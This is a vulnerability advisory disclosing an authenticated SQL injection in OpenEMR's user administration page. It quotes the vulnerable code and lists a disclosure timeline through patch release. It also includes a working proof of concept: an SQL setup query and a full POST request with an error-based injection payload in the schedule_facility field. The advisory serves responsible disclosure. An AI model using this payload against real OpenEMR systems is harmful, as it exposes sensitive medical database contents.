Product: OpenEMR 6.0.0-dev, OpenEMR 5.0.2(5)
Vulnerability: SQL injection
Discovered: Kutlymurat Mambetniyazov (@manfromkz)
Acknowledgements: NitroTeam.kz
Date: 11/24/2020
Description: Ineffective use of add_escape_custom() in interface/usergroup/usergroup_admin.php leads to SQL injection.
Requirements: global restrict_user_facility = on, the administrator account
Tested on: Windows 10, Apache 2.4, 10.3.22-MariaDB. PHP 7.1.33 for OpenEMR 5.0.2(5) and PHP 7.4 for OpenEMR 6.0.0-dev
Vulnerable code: interface/usergroup/usergroup_admin.php:150
and facility_id not in (" . add_escape_custom(implode(",", $_POST['schedule_facility'])) . ")", array($_POST["id"]));
Steps to reproduce:
1. Run the SQL query to meet the requirements:
UPDATE `globals` SET `gl_value` = '1' WHERE `globals`.`gl_name` = 'restrict_user_facility'
2. Send the POST request (replace with your Host, valid csrf_token_form and OpenEMR cookie of administrator):
POST /interface/usergroup/usergroup_admin.php HTTP/1.1
Host: openemr60.kz
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 420
Connection: close
Cookie: OpenEMR=FolYY6Y6%2CNwDDANwci5GfRdQXosr2ZkZ76e7PNHPJGTTc-eD;
csrf_token_form=639ee383724ab4de7bd56e47a454ea96cadeb6de&pre_active=1&get_admin_id=0&admin_id=&check_acl=&mname=&lname=Administrator&facility_id=3&taxid=&drugid=&upin=&see_auth=1&npi=&job=&main_menu_role=standard&patient_menu_role=standard&access_group%5B%5D=Administrators&comments=&id=1&mode=update&privatemode=user_admin&secure_pwd=1&schedule_facility[]=1&schedule_facility[]=extractvalue(0x0a,concat(0x0a,(user())))
Screenshot for 6.0.0-dev:
Screenshot for 5.0.2(5):
Timeline of the vulnerability:
11/24/2020 – vulnerability discover
11/24/2020 – notification to vendor
11/25/2020 – confirmation by vendor
11/27/2020 – reservation of CVE ID at MITRE
01/07/2021 – patch release
02/15/2021 – published